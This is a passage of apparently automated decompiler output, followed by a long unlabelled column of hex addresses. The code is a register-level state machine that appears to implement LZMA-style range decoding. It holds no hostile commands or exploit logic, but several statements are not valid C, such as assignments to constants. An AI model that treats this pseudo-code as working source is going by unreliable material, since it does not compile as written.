							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                                                          0x00000000
                                                                                                                          0x0040667f
                                                                                                                          0x0040667f
                                                                                                                          0x00406683
                                                                                                                          0x0040673a
                                                                                                                          0x0040673d
                                                                                                                          0x00406749
                                                                                                                          0x0040662a
                                                                                                                          0x0040662a
                                                                                                                          0x0040662d
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x004069a2
                                                                                                                          0x004069a2
                                                                                                                          0x004069a8
                                                                                                                          0x004069ae
                                                                                                                          0x004069b4
                                                                                                                          0x004069ce
                                                                                                                          0x004069d1
                                                                                                                          0x004069d7
                                                                                                                          0x004069e2
                                                                                                                          0x004069e4
                                                                                                                          0x004069b6
                                                                                                                          0x004069b6
                                                                                                                          0x004069c5
                                                                                                                          0x004069c9
                                                                                                                          0x004069c9
                                                                                                                          0x004069ee
                                                                                                                          0x00406a15
                                                                                                                          0x00406a15
                                                                                                                          0x00406a1b
                                                                                                                          0x00406a1b
                                                                                                                          0x00000000
                                                                                                                          0x004069f0
                                                                                                                          0x004069f0
                                                                                                                          0x004069f4
                                                                                                                          0x00406ba3
                                                                                                                          0x00000000
                                                                                                                          0x00406ba3
                                                                                                                          0x00406a00
                                                                                                                          0x00406a07
                                                                                                                          0x00406a0f
                                                                                                                          0x00406a12
                                                                                                                          0x00000000
                                                                                                                          0x00406a12
                                                                                                                          0x00406689
                                                                                                                          0x0040668d
                                                                                                                          0x00406bce
                                                                                                                          0x00406bce
                                                                                                                          0x00406bd1
                                                                                                                          0x00406bd5
                                                                                                                          0x00406bd5
                                                                                                                          0x00406693
                                                                                                                          0x00406699
                                                                                                                          0x0040669c
                                                                                                                          0x004066a0
                                                                                                                          0x004066a3
                                                                                                                          0x004066a7
                                                                                                                          0x00406b6d
                                                                                                                          0x00406bb9
                                                                                                                          0x00406bc1
                                                                                                                          0x00406bc8
                                                                                                                          0x00406bca
                                                                                                                          0x00000000
                                                                                                                          0x00406bca
                                                                                                                          0x004066ad
                                                                                                                          0x004066b0
                                                                                                                          0x004066b6
                                                                                                                          0x004066b8
                                                                                                                          0x004066b8
                                                                                                                          0x004066bb
                                                                                                                          0x004066be
                                                                                                                          0x004066c1
                                                                                                                          0x004066c4
                                                                                                                          0x004066c7
                                                                                                                          0x004066ca
                                                                                                                          0x004066cb
                                                                                                                          0x004066cd
                                                                                                                          0x004066cd
                                                                                                                          0x004066cd
                                                                                                                          0x004066d0
                                                                                                                          0x004066d3
                                                                                                                          0x004066d6
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066dc
                                                                                                                          0x004066de
                                                                                                                          0x004066de
                                                                                                                          0x004066e1
                                                                                                                          0x004066e1
                                                                                                                          0x004066e1
                                                                                                                          0x004061b7
                                                                                                                          0x004061b7
                                                                                                                          0x004061c0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061c6
                                                                                                                          0x00000000
                                                                                                                          0x004061d1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061da
                                                                                                                          0x004061dd
                                                                                                                          0x004061e0
                                                                                                                          0x004061e4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061ea
                                                                                                                          0x004061ed
                                                                                                                          0x004061ef
                                                                                                                          0x004061f0
                                                                                                                          0x004061f3
                                                                                                                          0x004061f5
                                                                                                                          0x004061f6
                                                                                                                          0x004061f8
                                                                                                                          0x004061fb
                                                                                                                          0x00406200
                                                                                                                          0x00406205
                                                                                                                          0x0040620e
                                                                                                                          0x00406221
                                                                                                                          0x00406224
                                                                                                                          0x00406230
                                                                                                                          0x00406258
                                                                                                                          0x0040625a
                                                                                                                          0x00406268
                                                                                                                          0x00406268
                                                                                                                          0x0040626c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040625c
                                                                                                                          0x0040625c
                                                                                                                          0x0040625f
                                                                                                                          0x00406260
                                                                                                                          0x00406260
                                                                                                                          0x00000000
                                                                                                                          0x0040625c
                                                                                                                          0x00406236
                                                                                                                          0x0040623b
                                                                                                                          0x0040623b
                                                                                                                          0x00406244
                                                                                                                          0x0040624c
                                                                                                                          0x0040624f
                                                                                                                          0x00000000
                                                                                                                          0x00406255
                                                                                                                          0x00406255
                                                                                                                          0x00000000
                                                                                                                          0x00406255
                                                                                                                          0x00000000
                                                                                                                          0x00406272
                                                                                                                          0x00406272
                                                                                                                          0x00406276
                                                                                                                          0x00406b22
                                                                                                                          0x00000000
                                                                                                                          0x00406b22
                                                                                                                          0x0040627f
                                                                                                                          0x0040628f
                                                                                                                          0x00406292
                                                                                                                          0x00406295
                                                                                                                          0x00406295
                                                                                                                          0x00406295
                                                                                                                          0x00406298
                                                                                                                          0x0040629c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040629e
                                                                                                                          0x004062a4
                                                                                                                          0x004062ce
                                                                                                                          0x004062d4
                                                                                                                          0x004062db
                                                                                                                          0x00000000
                                                                                                                          0x004062db
                                                                                                                          0x004062aa
                                                                                                                          0x004062ad
                                                                                                                          0x004062b2
                                                                                                                          0x004062b2
                                                                                                                          0x004062bd
                                                                                                                          0x004062c5
                                                                                                                          0x004062c8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040630d
                                                                                                                          0x00406313
                                                                                                                          0x00406316
                                                                                                                          0x00406323
                                                                                                                          0x0040632b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062e2
                                                                                                                          0x004062e2
                                                                                                                          0x004062e6
                                                                                                                          0x00406b31
                                                                                                                          0x00000000
                                                                                                                          0x00406b31
                                                                                                                          0x004062f2
                                                                                                                          0x004062fd
                                                                                                                          0x004062fd
                                                                                                                          0x004062fd
                                                                                                                          0x00406300
                                                                                                                          0x00406303
                                                                                                                          0x00406306
                                                                                                                          0x0040630b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406333
                                                                                                                          0x00406335
                                                                                                                          0x00406338
                                                                                                                          0x004063a9
                                                                                                                          0x004063ac
                                                                                                                          0x004063af
                                                                                                                          0x004063b6
                                                                                                                          0x004063c0
                                                                                                                          0x00000000
                                                                                                                          0x004063c0
                                                                                                                          0x0040633a
                                                                                                                          0x0040633e
                                                                                                                          0x00406341
                                                                                                                          0x00406343
                                                                                                                          0x00406346
                                                                                                                          0x00406349
                                                                                                                          0x0040634b
